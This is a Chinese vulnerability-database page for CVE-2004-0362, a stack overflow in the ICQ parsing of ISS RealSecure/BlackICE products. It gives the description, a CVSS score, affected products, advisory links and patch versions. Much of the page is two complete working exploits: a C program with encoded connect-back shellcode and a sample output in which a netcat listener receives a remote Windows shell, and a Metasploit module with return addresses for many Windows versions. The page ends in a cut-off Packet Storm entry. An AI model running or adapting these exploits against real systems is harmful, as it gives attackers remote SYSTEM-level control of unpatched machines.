CVE-2004-0362
CVSS7.5
发布时间 :2004-04-15 00:00:00
修订时间 :2016-10-17 22:44:39
NMCOEP    

[原文]Multiple stack-based buffer overflows in the ICQ parsing routines of the ISS Protocol Analysis Module (PAM) component, as used in various RealSecure, Proventia, and BlackICE products, allow remote attackers to execute arbitrary code via a SRV_MULTI response containing a SRV_USER_ONLINE response packet and a SRV_META_USER response packet with long (1) nickname, (2) firstname, (3) lastname, or (4) email address fields, as exploited by the Witty worm.


[CNNVD]ISS RealSecure/BlackICE协议分析模块ICQ应答处理缓冲区溢出漏洞(CNNVD-200404-038)

        
        ISS RealSecure/BlackICE的协议分析模块(PAM,Protocol Analysis Module)用于解析网络协议来执行进一步的分析和攻击检测,使用在当前所有ISS入侵检测产品中。
        ISS RealSecure/BlackICE PAM监视ICQ服务器应答处理函数中存在缓冲区溢出问题,远程攻击者可以利用这个漏洞进行远程缓冲区溢出攻击,可能以SYSTEM进程权限在系统上执行任意指令。
        如果PAM ICQ应答处理程序接收到一个SRV_META_USER应答时,会为包含的Nickname, firstname, lastname和EMAIL地址会分配一个指向结构的指针,后续的函数会把这些数据临时拷贝到512字节的缓冲区,但并没有任何过滤检查。要调用这些受影响的函数,攻击者只需构建包含两个嵌套应答包的SRV_USER_ONLINE应答。攻击者可以伪造数据帧发送到受ISS产品保护的网络、设备、主机。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/h:iss:proventia_a_series_xpu:22.2Internet Security Systems Proventia A Series XPU 22.2
cpe:/h:iss:proventia_m_series_xpu:1.7Internet Security Systems Proventia M Series XPU 1.7
cpe:/h:iss:proventia_a_series_xpu:22.3Internet Security Systems Proventia A Series XPU 22.3
cpe:/h:iss:proventia_m_series_xpu:1.8Internet Security Systems Proventia M Series XPU 1.8
cpe:/h:iss:proventia_a_series_xpu:22.8Internet Security Systems Proventia A Series XPU 22.8
cpe:/h:iss:proventia_m_series_xpu:1.1Internet Security Systems Proventia M Series XPU 1.1
cpe:/h:iss:proventia_a_series_xpu:22.9Internet Security Systems Proventia A Series XPU 22.9
cpe:/h:iss:proventia_m_series_xpu:1.2Internet Security Systems Proventia M Series XPU 1.2
cpe:/h:iss:proventia_a_series_xpu:22.6Internet Security Systems Proventia A Series XPU 22.6
cpe:/h:iss:proventia_m_series_xpu:1.3Internet Security Systems Proventia M Series XPU 1.3
cpe:/h:iss:proventia_a_series_xpu:22.7Internet Security Systems Proventia A Series XPU 22.7
cpe:/h:iss:proventia_m_series_xpu:1.4Internet Security Systems Proventia M Series XPU 1.4
cpe:/h:iss:proventia_m_series_xpu:1.9Internet Security Systems Proventia M Series XPU 1.9
cpe:/h:iss:proventia_m_series_xpu:1.5Internet Security Systems Proventia M Series XPU 1.5
cpe:/h:iss:proventia_m_series_xpu:1.6Internet Security Systems Proventia M Series XPU 1.6
cpe:/a:iss:blackice_server_protection:3.6cbzInternet Security Systems BlackICE Server Protection 3.6cbz
cpe:/a:iss:blackice_server_protection:3.6ccaInternet Security Systems BlackICE Server Protection 3.6cca
cpe:/a:iss:blackice_server_protection:3.6ccbInternet Security Systems BlackICE Server Protection 3.6ccb
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_22.10
cpe:/h:iss:proventia_a_series_xpu:22.1Internet Security Systems Proventia A Series XPU 22.1
cpe:/h:iss:proventia_a_series_xpu:22.4Internet Security Systems Proventia A Series XPU 22.4
cpe:/h:iss:proventia_a_series_xpu:22.5Internet Security Systems Proventia A Series XPU 22.5
cpe:/a:iss:realsecure_server_sensor:6.0.1_win_sr1.1
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.1
cpe:/a:iss:realsecure_server_sensor:6.5::windows
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.9
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.6
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.6
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.5
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.9
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.4
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.2
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.1
cpe:/a:iss:realsecure_server_sensor:6.5:sr3.3:windows
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.5
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.8
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_22.9
cpe:/a:iss:realsecure_server_sensor:6.5:sr3.2:windows
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.7
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_22.4
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.7
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.8
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.10
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.4
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.3
cpe:/a:iss:realsecure_server_sensor:6.0::windows
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.10
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.11
cpe:/a:iss:blackice_pc_protection:3.6cbzInternet Security Systems BlackICE PC Protection 3.6cbz
cpe:/a:iss:realsecure_guard:3.6ecfInternet Security Systems RealSecure Guard 3.6ecf
cpe:/a:iss:realsecure_server_sensor:6.0.1::windows
cpe:/a:iss:realsecure_guard:3.6eceInternet Security Systems RealSecure Guard 3.6ece
cpe:/a:iss:blackice_pc_protection:3.6ccbInternet Security Systems BlackICE PC Protection 3.6ccb
cpe:/a:iss:blackice_pc_protection:3.6ccaInternet Security Systems BlackICE PC Protection 3.6cca
cpe:/a:iss:blackice_pc_protection:3.6cccInternet Security Systems BlackICE PC Protection 3.6ccc
cpe:/a:iss:blackice_pc_protection:3.6ccfInternet Security Systems BlackICE PC Protection 3.6ccf
cpe:/a:iss:blackice_pc_protection:3.6cceInternet Security Systems BlackICE PC Protection 3.6cce
cpe:/a:iss:realsecure_guard:3.6ecdInternet Security Systems RealSecure Guard 3.6ecd
cpe:/a:iss:realsecure_guard:3.6eccInternet Security Systems RealSecure Guard 3.6ecc
cpe:/a:iss:realsecure_guard:3.6ecbInternet Security Systems RealSecure Guard 3.6ecb
cpe:/a:iss:realsecure_guard:3.6ecaInternet Security Systems RealSecure Guard 3.6eca
cpe:/a:iss:blackice_pc_protection:3.6ccdInternet Security Systems BlackICE PC Protection 3.6ccd
cpe:/a:iss:realsecure_guard:3.6ebzInternet Security Systems RealSecure Guard 3.6ebz
cpe:/a:iss:realsecure_desktop:7.0ebjInternet Security Systems RealSecure Desktop 7.0ebj
cpe:/a:iss:realsecure_desktop:7.0eblInternet Security Systems RealSecure Desktop 7.0ebl
cpe:/a:iss:realsecure_desktop:7.0ebgInternet Security Systems RealSecure Desktop 7.0ebg
cpe:/a:iss:realsecure_desktop:7.0ebfInternet Security Systems RealSecure Desktop 7.0ebf
cpe:/a:iss:realsecure_desktop:7.0ebhInternet Security Systems RealSecure Desktop 7.0ebh
cpe:/h:iss:proventia_g_series_xpu:22.6Internet Security Systems Proventia G Series XPU 22.6
cpe:/h:iss:proventia_g_series_xpu:22.7Internet Security Systems Proventia G Series XPU 22.7
cpe:/h:iss:proventia_g_series_xpu:22.8Internet Security Systems Proventia G Series XPU 22.8
cpe:/h:iss:proventia_g_series_xpu:22.9Internet Security Systems Proventia G Series XPU 22.9
cpe:/a:iss:realsecure_sentry:3.6eceInternet Security Systems RealSecure Sentry 3.6ece
cpe:/h:iss:proventia_g_series_xpu:22.2Internet Security Systems Proventia G Series XPU 22.2
cpe:/a:iss:realsecure_sentry:3.6ecfInternet Security Systems RealSecure Sentry 3.6ecf
cpe:/h:iss:proventia_g_series_xpu:22.3Internet Security Systems Proventia G Series XPU 22.3
cpe:/h:iss:proventia_g_series_xpu:22.4Internet Security Systems Proventia G Series XPU 22.4
cpe:/h:iss:proventia_g_series_xpu:22.5Internet Security Systems Proventia G Series XPU 22.5
cpe:/h:iss:proventia_g_series_xpu:22.1Internet Security Systems Proventia G Series XPU 22.1
cpe:/a:iss:realsecure_sentry:3.6ecaInternet Security Systems RealSecure Sentry 3.6eca
cpe:/a:iss:realsecure_desktop:7.0ebaInternet Security Systems RealSecure Desktop 7.0eba
cpe:/a:iss:realsecure_sentry:3.6ecbInternet Security Systems RealSecure Sentry 3.6ecb
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_20.11
cpe:/a:iss:realsecure_sentry:3.6eccInternet Security Systems RealSecure Sentry 3.6ecc
cpe:/a:iss:realsecure_sentry:3.6ecdInternet Security Systems RealSecure Sentry 3.6ecd
cpe:/a:iss:realsecure_network_sensor:7.0Internet Security Systems RealSecure Network Sensor 7.0
cpe:/a:iss:realsecure_desktop:3.6ebzInternet Security Systems RealSecure Desktop 3.6ebz
cpe:/a:iss:realsecure_sentry:3.6ebzInternet Security Systems RealSecure Sentry 3.6ebz
cpe:/a:iss:realsecure_desktop:3.6ecbInternet Security Systems RealSecure Desktop 3.6ecb
cpe:/h:iss:proventia_a_series_xpu:22.10Internet Security Systems Proventia A Series XPU 22.10
cpe:/a:iss:realsecure_desktop:3.6eceInternet Security Systems RealSecure Desktop 3.6ece
cpe:/a:iss:realsecure_desktop:3.6ecdInternet Security Systems RealSecure Desktop 3.6ecd
cpe:/a:iss:realsecure_desktop:3.6ecaInternet Security Systems RealSecure Desktop 3.6eca
cpe:/a:iss:realsecure_desktop:7.0ebkInternet Security Systems RealSecure Desktop 7.0ebk
cpe:/a:iss:realsecure_desktop:3.6ecfInternet Security Systems RealSecure Desktop 3.6ecf
cpe:/a:iss:blackice_agent_server:3.6ebzInternet Security Systems BlackICE Agent Server 3.6ebz
cpe:/a:iss:blackice_server_protection:3.6cceInternet Security Systems BlackICE Server Protection 3.6cce
cpe:/a:iss:blackice_server_protection:3.6ccfInternet Security Systems BlackICE Server Protection 3.6ccf
cpe:/a:iss:blackice_server_protection:3.6cccInternet Security Systems BlackICE Server Protection 3.6ccc
cpe:/a:iss:blackice_server_protection:3.6ccdInternet Security Systems BlackICE Server Protection 3.6ccd
cpe:/h:iss:proventia_a_series_xpu:20.11Internet Security Systems Proventia A Series XPU 20.11
cpe:/a:iss:blackice_agent_server:3.6ecfInternet Security Systems BlackICE Agent Server 3.6ecf
cpe:/a:iss:blackice_agent_server:3.6eceInternet Security Systems BlackICE Agent Server 3.6ece
cpe:/h:iss:proventia_g_series_xpu:22.11Internet Security Systems Proventia G Series XPU 22.11
cpe:/h:iss:proventia_g_series_xpu:22.10Internet Security Systems Proventia G Series XPU 22.10
cpe:/a:iss:blackice_agent_server:3.6eccInternet Security Systems BlackICE Agent Server 3.6ecc
cpe:/a:iss:blackice_agent_server:3.6ecbInternet Security Systems BlackICE Agent Server 3.6ecb
cpe:/a:iss:blackice_agent_server:3.6ecaInternet Security Systems BlackICE Agent Server 3.6eca
cpe:/a:iss:blackice_agent_server:3.6ecdInternet Security Systems BlackICE Agent Server 3.6ecd

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0362
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0362
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-038
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107965651712378&w=2
(UNKNOWN)  BUGTRAQ  20040318 EEYE: Internet Security Systems PAM ICQ Server Response Processing Vulnerability
http://www.ciac.org/ciac/bulletins/o-104.shtml
(UNKNOWN)  CIAC  O-104
http://www.eeye.com/html/Research/Advisories/AD20040318.html
(UNKNOWN)  EEYE  AD20040318
http://www.kb.cert.org/vuls/id/947254
(VENDOR_ADVISORY)  CERT-VN  VU#947254
http://www.securityfocus.com/bid/9913
(VENDOR_ADVISORY)  BID  9913
http://xforce.iss.net/xforce/alerts/id/166
(VENDOR_ADVISORY)  ISS  20040318 Vulnerability in ICQ Parsing in ISS Products
http://xforce.iss.net/xforce/xfdb/15442
(UNKNOWN)  XF  pam-icq-parsing-bo(15442)
http://xforce.iss.net/xforce/xfdb/15543
(UNKNOWN)  XF  witty-worm-propagation(15543)

- 漏洞信息

ISS RealSecure/BlackICE协议分析模块ICQ应答处理缓冲区溢出漏洞
高危 未知
2004-04-15 00:00:00 2006-06-15 00:00:00
远程  
        
        ISS RealSecure/BlackICE的协议分析模块(PAM,Protocol Analysis Module)用于解析网络协议来执行进一步的分析和攻击检测,使用在当前所有ISS入侵检测产品中。
        ISS RealSecure/BlackICE PAM监视ICQ服务器应答处理函数中存在缓冲区溢出问题,远程攻击者可以利用这个漏洞进行远程缓冲区溢出攻击,可能以SYSTEM进程权限在系统上执行任意指令。
        如果PAM ICQ应答处理程序接收到一个SRV_META_USER应答时,会为包含的Nickname, firstname, lastname和EMAIL地址会分配一个指向结构的指针,后续的函数会把这些数据临时拷贝到512字节的缓冲区,但并没有任何过滤检查。要调用这些受影响的函数,攻击者只需构建包含两个嵌套应答包的SRV_USER_ONLINE应答。攻击者可以伪造数据帧发送到受ISS产品保护的网络、设备、主机。
        

- 公告与补丁

        厂商补丁:
        ISS
        ---
        升级到如下版本:
        RealSecure Network 7.0, XPU 22.12
        RealSecure Server Sensor 7.0 XPU 22.12
        Proventia A Series XPU 22.12
        Proventia G Series XPU 22.12
        Proventia M Series XPU 1.10
        RealSecure Desktop 7.0 ebm
        RealSecure Desktop 3.6 ecg
        RealSecure Guard 3.6 ecg
        RealSecure Sentry 3.6 ecg
        BlackICE Agent for Server 3.6 ecg
        RealSecure Server Sensor 6.5 for Windows SR 3.11
        BlackICE PC Protection 3.6 ccg
        BlackICE Server Protection 3.6 ccg
        用户可从如下地址获得:
        
        http://www.iss.net/download/

- 漏洞信息 (168)

RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit (EDBID:168)
windows remote
2004-03-28 Verified
0 Sam
N/A [点击下载]
/* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam (Sam`@efnet) and 2004/03/26 
* <chen_xiaobo@venustech.com.cn>
* <Sam@0x557.org>
* 
* 
*
* Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c
*
* how works?
* [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570
* 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit
* - Sam
*
* # attack remote host: 192.168.10.2.
* # listen host: 192.168.10.169.
* # listen port: 5570.
* # send overflow udp datas
* # 1199 bytes send
* # done.
* # make sure we are in, dude :)
*
*
* [root@core root]# nc -vv -l -p 5570
* listening on [any] 5570 ...
* 192.168.10.2: inverse host lookup failed: Host name lookup failure
* connect to [192.168.10.169] from (UNKNOWN) [192.168.10.2] 3604
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Program Files\ISS\BlackICE>
* C:\Program Files\ISS\BlackICE>
* C:\Program Files\ISS\BlackICE>
*
*
* some thanks/greets to:
* eeye (they find this bug :D), airsupply, kkqq, icbm, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/

#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>

char icq_header [] =
"\x05\x00" // ICQ VERSION
"\x00" // unused
"\x00\x00\x00\x00" // Session ID
"\x12\x02" // reply to SRV_MULTI_PACKET 
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN 
"\x00\x00\x00\x00" // CHECKCODE
"\x02" // SRV_MULTI Parameter Block 1 of 2
// Number of individual responses
"\x2c\x00" // Size of sub-response (44 bytes, little-endian) 

"\x05\x00" // ICQ VERSION
"\x00" // unused 
"\x00\x00\x00\x00" // Session ID
"\x6e\x00" // reply to SRV_USER_OLINE
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x00" // UIN of user changing status
"\x01\x00\x00\x00" // Other user's IP address (1.0.0.0)
"\x00\x00\x00\x00" // Other user's direct-connect port (default)
"\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00"
"\x41\x02" // SRV_MULTI Parameter Block 2 of 2 
// Size of sub-response (577 bytes)

"\x05\x00" // ICQ VERSION
"\x00" // unused 
"\x00\x00\x00\x00" // Session ID
"\xde\x03" // reply to SRV_META_USER
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x01" 
"\x00\x00\x01\x00"
"\x00\x01\x00\x00"
"\x1e\x02";


struct sockaddr_in addr, local;
char *bindHost = NULL;
unsigned short port;
/* 
* hsj's connect back shellcodes
*/
char shellcode [] =
/* decoder */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
/* code */
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50";




/* udpconnect:
* 
*/
int udpConnect (char *hostName)
{

struct hostent* host = NULL;
int sock = -1;

host = gethostbyname (hostName);
if (NULL == host) {
perror ("gethostbyname() failed");
return -1;
}

sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if ( -1 == sock) {
perror ("socket() failed\n");
return -1;
}

memset (&addr, 0x00, sizeof (addr));
addr.sin_addr = *(struct in_addr *) host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(random());

memset (&local, 0x00, sizeof (local));
local.sin_family = AF_INET;
local.sin_addr.s_addr = htonl (INADDR_ANY);
local.sin_port = htons(4000);


if (bind (sock, (struct sockaddr *) &local, sizeof(local)) != 0) {
perror ("bind error\n");
return -1;
}

return sock;
}

/* resolve listen host
*/
unsigned int resolve (char *name)
{
struct hostent *he;
unsigned int ip;

if ((ip = inet_addr (name)) == (-1)) {
if ((he = gethostbyname (name)) ==0 )
return 0;
memcpy (&ip, he->h_addr, 4);
}
return ip;
}


/*
* send datas
*/
int udp_send (int sock, char *buffer, int buff_len)
{
int ret;

ret = sendto (sock, buffer, buff_len, 0, (struct sockaddr *)&addr,
sizeof (struct sockaddr_in));
if (ret <= NULL) {
perror ("sendto failed\n");
return -1;
}

fprintf (stderr, "# %d bytes send\n", ret);

return ret;
}

/*
* send evil datas, fuck ISS's blackice.
*/
int do_sendudp_data (char *hostName)
{
unsigned int cb;
int sock;
char expbuf[1200];

memset (expbuf, 0x90, sizeof (expbuf));
memcpy (expbuf, icq_header, sizeof (icq_header) - 1);

/*
* jmp esp opcodes from iss_pam1.dll
*/
*(unsigned int *)&expbuf[637] = 0x5e077663;

if (!(cb = resolve (bindHost))) {
printf ("Unknown listen host\n");
return -1;
}
port = htons (port);
port ^= 0x9393;
cb ^= 0x93939393;

*(unsigned short *)&shellcode[330] = port;
*(unsigned int *)&shellcode[335] = cb;

memcpy (expbuf + 637 + 4, shellcode, strlen (shellcode));
if ((sock = udpConnect (hostName)) < 0) {
printf ("connect failed\n");
exit (-1);
}

fprintf (stderr, "# send overflow udp datas\n");
udp_send (sock, expbuf, sizeof (expbuf) - 1);

close (sock);
return 0;


}


/*
* just main . dude.
*/
int main (int argc, char **argv)
{
int new;
char *target = NULL;

fprintf (stderr, "557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit\n - Sam\n\n");
if (argc != 4) {
fprintf (stderr, "%s <hostname> <listenhost> <listen port>\n", argv[0]);
fprintf (stderr, "listenhost, port: connect back host and port\n\n");
return -1;
}

target = argv[1];
bindHost = argv[2];
port = atoi (argv[3]);

fprintf (stderr, "# attack remote host: %s. \n", target);
fprintf (stderr, "# listen host: %s. \n", bindHost);
fprintf (stderr, "# listen port: %d. \n", port);
do_sendudp_data (target);

fprintf (stderr, "# done.\n");

fprintf (stderr, "# make sure we are in, dude :)\n\n");

return 0;
}

// milw0rm.com [2004-03-28]
		

- 漏洞信息 (16464)

ISS PAM.dll ICQ Parser Buffer Overflow (EDBID:16464)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: blackice_pam_icq.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ISS PAM.dll ICQ Parser Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the ISS products that use
				the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
				will result in arbitrary code execution as LocalSystem. This exploit
				only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
				address.

				The ISS exception handler will recover the process after each overflow, giving
				us the ability to bruteforce the service and exploit it multiple times.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2004-0362'],
					['OSVDB', '4355'],
					['URL',   'http://www.eeye.com/html/Research/Advisories/AD20040318.html'],
					['URL',   'http://xforce.iss.net/xforce/alerts/id/166'],
				],
			'Payload'        =>
				{
					'Space'           => 504 -31 -4,
					'BadChars'        => "\x00",
					'MinNops'         => 0,
					'MaxNops'         => 0,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Bruteforce',                   {  } ],
					[ 'Bruteforce iis-pam1.dll',      { 'Targets' => 3 .. 4  } ],
					[ 'Bruteforce NT 4.0',            { 'Targets' => 5 .. 15 } ],
					[ 'iis-pam1.dll 3.6.06',          { 'Ret' => 0x5e0a47ef } ],
					[ 'iis-pam1.dll 3.6.11',          { 'Ret' => 0x5e0da1db } ],
					[ 'WinNT SP3/SP4/SP5',            { 'Ret' => 0x777e79ab } ],
					[ 'WinNT SP4/SP5',                { 'Ret' => 0x7733b8db } ],
					[ 'WinNT SP5/SP6 - advapi32',     { 'Ret' => 0x77dcd1cb } ],
					[ 'WinNT SP3/SP5/SP6 - shell32',  { 'Ret' => 0x77cec080 } ],
					[ 'WinNT SP5/SP6 - mswsock',      { 'Ret' => 0x7767ebca } ],
					[ 'WinXP SP0/SP1 - shell32',      { 'Ret' => 0x776606af } ],
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76b305a7 } ],
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76e61a21 } ],
					[ 'WinXP SP0/SP1 - ws2_32',       { 'Ret' => 0x71ab7bfb } ],
					[ 'WinXP SP0/SP1 - mswsock',      { 'Ret' => 0x71a5403d } ],
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Win2000 SP0 - SP4',            { 'Ret' => 0x750231e2 } ],
					[ 'Win2000 SP2/SP3 - samlib',     { 'Ret' => 0x75159da3 } ],
					[ 'Win2000 SP0/SP1 - activeds',   { 'Ret' => 0x77ed0beb } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],
					[ 'WinXP SP0 - SP1',              { 'Ret' => 0x71aa3a4b } ],
					[ 'Win2003 SP0',                  { 'Ret' => 0x71bf3cc9 } ],
				],
			'DisclosureDate' => 'Mar 18 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(1)
			], self.class)
	end

	def exploit
		datastore['RPORT'] = rand(65536) if rport == 1

		targs = [ target ]

		if target.name =~ /^Brute/
			if target['Targets']
				targs = []

				target['Targets'].each { |idx|
					targs << targets[idx]
				}
			else
				targs = targets.dup

				targs.delete_at(0)
				targs.delete_at(0)
				targs.delete_at(0)
			end
		end

		targs.each { |targ|
			print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

			shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)
			email     = rand_text_english(19) + [targ.ret].pack('V') + shellcode

			# Hopefully this structure is correct -- ported from msf 2.  Blame me
			# (skape) if it doesn't work!
			packet    =
				# SRV_MULTI
				[5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') +
				# SRV_USER_ONLINE
				[5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +
				[1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +
				# SRV_META_USER
				[5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +
				"\x00\x00\x0a" + # subcommand / success
				"\x00\x00"     + # nick length / nick
				"\x00\x00"     + # first length / first
				"\x00\x00"     + # last length / last
				[email.length].pack('v') + email +
				"\x00\x00\x00\x00\x00\x00\x00"

			print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

			connect_udp(true, { 'CPORT' => 4000 })
			udp_sock.put(packet)
			disconnect_udp

			print_status("Sleeping (giving exception handler time to recover)")

			select(nil,nil,nil,5)
		}
	end

end
		

- 漏洞信息 (F83212)

ISS PAM.dll ICQ Parser Buffer Overflow (PacketStormID:F83212)
2009-11-26 00:00:00
spoonm  metasploit.com
exploit,overflow,arbitrary,udp,spoof,code execution
CVE-2004-0362
[点击下载]

This Metasploit module exploits a stack overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


